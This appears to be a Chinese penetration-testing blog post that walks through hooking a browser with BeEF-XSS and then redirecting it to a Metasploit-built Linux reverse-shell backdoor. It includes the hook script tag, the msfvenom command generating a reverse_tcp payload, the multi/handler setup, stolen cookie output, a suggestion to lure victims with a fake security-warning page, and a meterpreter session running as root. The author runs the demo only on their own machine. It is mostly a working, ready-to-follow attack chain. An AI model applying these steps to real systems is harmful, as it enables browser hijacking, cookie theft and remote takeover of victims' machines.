内网渗透小计之从劫持浏览器客户端到渗透Linux系统全过程

服务器

浏览数:30

2020-7-16

AD:资源代下载服务

本机是Ubuntu系统 所以我们直接本机实战好了 大晚上的 睡不着 写篇文章在睡

先来讲一下劫持浏览器
劫持浏览器用到的工具为beef-xss
在Ubuntu中 如果你想安装的话 直接吧kali源添加进去后
apt-get install beef-xss //安装
打开的话 直接beef-xss
如下图

root@xaiSec:/home/hacker# beef-xss Please wait as BeEF services are started. You might need to refresh your browser once it opens. UI URL: [url]http://127.0.0.1:3000/ui/panel[/url] Hook: <script src="http://<IP>:3000/hook.js"></script> Example: <script src="http://127.0.0.1:3000/hook.js"></script>

然后他会自动弹出一个网站
http://127.0.0.1:3000/ui/authentication
网站是beef-xss平台 就相当于xss平台一样  用于接收cookie等信息的
<script src=”http://<IP>:3000/hook.js”></script>  ip改成我们本机在内网中的ip即可
ifconfig 查看

192.168.0.3
那么 xss在内网中的链接为 192.168.0.3:3000/hook.js
打开看一下 会看到一些代码 这里我们不用管他

直接吧xss代码加入到html里面

当然也可以配合dns欺骗 和xerosploit的话会达到更好的效果 这里就不演示了
接着我们来打开test.html一下
test.html 里面有我们的xss代码
如下图

这个时候我们的beef-xss平台以及提示上线

双击192.168.0.3
因为我们这是本机测试的
双击后就会看到我们的浏览器版本信息 客户端信息等

表单如下

Browser Version: UNKNOWN


Initialization



Browser UA String: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0


Initialization



Browser Language: zh-CN


Initialization



Browser Platform: Linux x86_64


Initialization



Browser Plugins: IcedTea-Web Plugin (using IcedTea-Web 1.6.2 (1.6.2-3.1ubuntu3)),Shockwave Flash


Initialization



Window Size: Width: 1153, Height: 557


Initialization





Category: Browser Components (12 Items)


Flash: Yes


Initialization



VBScript: No


Initialization



PhoneGap: No


Initialization



Google Gears: No


Initialization



Web Sockets: Yes


Initialization



QuickTime: No


Initialization



RealPlayer: No


Initialization



Windows Media Player: No


Initialization



WebRTC: Yes


Initialization



ActiveX: No


Initialization



Session Cookies: Yes


Initialization



Persistent Cookies: Yes


Initialization





Category: Hooked Page (5 Items)


Page Title: Unknown


Initialization



Page URI: file:///home/hacker/%E6%A1%8C%E9%9D%A2/test.html


Initialization



Page Referrer: Unknown


Initialization



Host Name/IP: Unknown


Initialization



Cookies: BEEFHOOK=XDgHwC9lEBbzAkrJILOWQICmyuE82OKNoYCSwbFBQ4OnPmhe3NFKYB1MP84JdjQh1pWug40sEl8JeYyl


Initialization





Category: Host (8 Items)


Host Name/IP: 192.168.0.3


Initialization



Date: Tue Mar 14 2017 04:32:22 GMT+0800 (CST)


Initialization



Operating System: Linux


Initialization



Hardware: Laptop


Initialization



CPU: x86_64


Initialization



Default Browser: Unknown


Initialization



Screen Size: Width: 1366, Height: 768, Colour Depth: 24


Initialization



[backcolor=rgb(223, 232, 246) !important]

Touch Screen: No


Initialization

我们来让他跳转一下
当然 如果目标是xp或者Windows7(没打补丁的Windows7)的话 会直接劫持 ps:msf生成恶意地址 beef-xss劫持

如果我们让他跳转到 http://bbs.ichunqiu.com/
点击commands
Browser (53)  Hooked Domain (25) Redirect Browser

当然也有很多模块需要各种自己去测试 比如 盗取cookie

data: cookie=BEEFHOOK=XDgHwC9lEBbzAkrJILOWQICmyuE82OKNoYCSwbFBQ4OnPmhe3NFKYB1MP84JdjQh1pWug40sEl8JeYyl

继续来演示跳转

Redirect URL: 后面设置我们要跳转到的网站上
Execute //执行
这个时候你会发现我们的火狐浏览器已经成功跳转到了i春秋论坛

同样的原理
我们msf生成一个Linux后门
然后放到/var/www/html下
网址为:192.168.0.3/

Metasploit 生成后门
msfVENOM -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.3 lport=4444 -f elf -o test222

root@xaiSec:/home/hacker# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.3 lport=4444 -f elf -o test222

No platform was selected, choosing Msf::Module::Platform::Linux from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 71 bytes

Final size of elf file: 155 bytes

Saved as: test222

root@xaiSec:/home/hacker# 

赋予执行权限

root@xaiSec:/home/hacker# chmod +x ./test222

root@xaiSec:/home/hacker#

配置Metasploit

root@xaiSec:~# msfconsole

                                                   

IIIIII    dTb.dTb        _.---._

  II     4'  v  'B   .'"".'/|\`.""'.

  II     6.     .P  :  .' / | \ `.  :

  II     'T;. .;P'  '.'  /  |  \  `.'

  II      'T; ;P'    `. /   |   \ .'

IIIIII     'YvP'       `-.__|__.-'


I love shells --egypt



       =[ metasploit v4.14.1-dev-f02c323c7ed3ad6b5769691e03aefd1b45a36fbf]

+ -- --=[ 1628 exploits - 927 auxiliary - 282 post        ]

+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]

+ -- --=[ Free Metasploit Pro trial: [url]http://r-7.co/trymsp[/url] ]


msf > use exploit/multi/handler

msf exploit(handler) > set lhost 192.168.0.3

lhost => 192.168.0.3

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

payload => linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > run


[*] Started reverse TCP handler on 192.168.0.3:4444

[*] Starting the payload handler...


接着我们把后门复制到/var/www/html下
cp test222 /var/www/html/

root@xaiSec:/home/hacker# cp test222 /var/www/html/

root@xaiSec:/home/hacker# cd /var/www/html

root@xaiSec:/var/www/html# ls

index.html  index.lighttpd.html  test222  test222.html

root@xaiSec:/var/www/html#

从而打开192.168.0.3/test222

下载后门 //

接着我们让beef-xss 劫持浏览器跳转到 192.168.0.3/test222
可以自己写一个html 大致内容就是 你的系统安全问题 xxxxxx   Ps:原谅我语文不好 = =
劫持如下
我们发现已经跳转过来了

然后下载 自己运行下后门测试
……………………………………………………….. 此处省略n个字

运行后我们发现msf上线了

 

root@xaiSec:/var/www/html# ./test222

shell一下 然后回车
我们会看到已经拿到了这样一个权限

尝试执行下 ifconfig

成功执行
route //获取路由表信息

我们拿到了终端权限
接着Ctrl+c   退出shell终端

返回到meterpreter > help //查看帮助
系统命令 以下是经过谷歌翻译↓

核心命令

=============


    命令说明

    ------- -----------

    ?帮助菜单

    背景背景当前会话

    bgkill杀死一个背景meterpreter脚本

    bglist列出运行的后台脚本

    bgrun执行meterpreter脚本作为后台线程

    channel显示信息或控制活动通道

    close关闭通道

    disable_unicode_encoding禁用unicode字符串的编码

    enable_unicode_encoding启用Unicode字符串的编码

    exit终止meterpreter会话

    get_timeouts获取当前会话超时值

    帮助菜单

    info显示有关Post模块的信息

    irb进入irb脚本模式

    load加载一个或多个meterpreter扩展

    machine_id获取连接到会话的计算机的MSF ID

    migrate将服务器迁移到另一个进程

    quit终止meterpreter会话

    读取从通道读取数据

    resource运行存储在文件中的命令

    run执行meterpreter脚本或Post模块

    会话快速切换到另一个会话

    set_timeouts设置当前会话超时值

    睡眠强制Meterpreter去安静,然后重新建立会话。

    transport更改当前的传输机制

    使用“load”的已弃用别名

    uuid获取当前会话的UUID

    write将数据写入通道



Stdapi:文件系统命令

============================


    命令说明

    ------- -----------

    cat将文件的内容读取到屏幕

    cd更改目录

    checksum检索文件的校验和

    cp将源复制到目标

    dir列表文件(ls的别名)

    下载下载文件或目录

    编辑编辑文件

    getlwd打印本地工作目录

    getwd打印工作目录

    lcd更改本地工作目录

    lpwd打印本地工作目录

    ls列表文件

    mkdir创建目录

    mv将源移动到目标

    pwd打印工作目录

    rm删除指定的文件

    rmdir删除目录

    upload上传文件或目录



Stdapi:网络命令

=========================


    命令说明

    ------- -----------

    arp显示主机ARP缓存

    ifconfig显示接口

    ipconfig显示接口

    netstat显示网络连接

    portfwd将本地端口转发到远程服务

    route查看和修改路由表



Stdapi:系统命令

=====================


    命令说明

    ------- -----------

    execute执行命令

    getenv获取一个或多个环境变量值

    getpid获取当前进程标识符

    getprivs尝试启用当前进程可用的所有特权

    getuid获取服务器正在运行的用户

    kill终止进程

    localtime显示目标系统的本地日期和时间

    ps列出正在运行的进程

    rev2self在远程机器上调用RevertToSelf()

    shell放入系统命令shell

    suspend挂起或恢复进程列表

    sysinfo获取有关远程系统(如操作系统)的信息

ps //查看进程
getuid // 获取服务器正在运行的用户
sysinfo // 查看目标机系统信息,如机器名,操作系统等

meterpreter > getuid

Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0

meterpreter > sysinfo

Computer     : xaiSec

OS           : Linux xaiSec 4.10.0-11-generic #13-Ubuntu SMP Wed Mar 1 21:27:28 UTC 2017 (x86_64)

Architecture : x64

Meterpreter  : x86/linux

meterpreter >

还有很多好玩的 需要大家自己去测试 mdzz  睡觉了 大晚上的 给你们写这篇文章 各位大佬给点好评呗

结束语:勿忘初心 方得始终.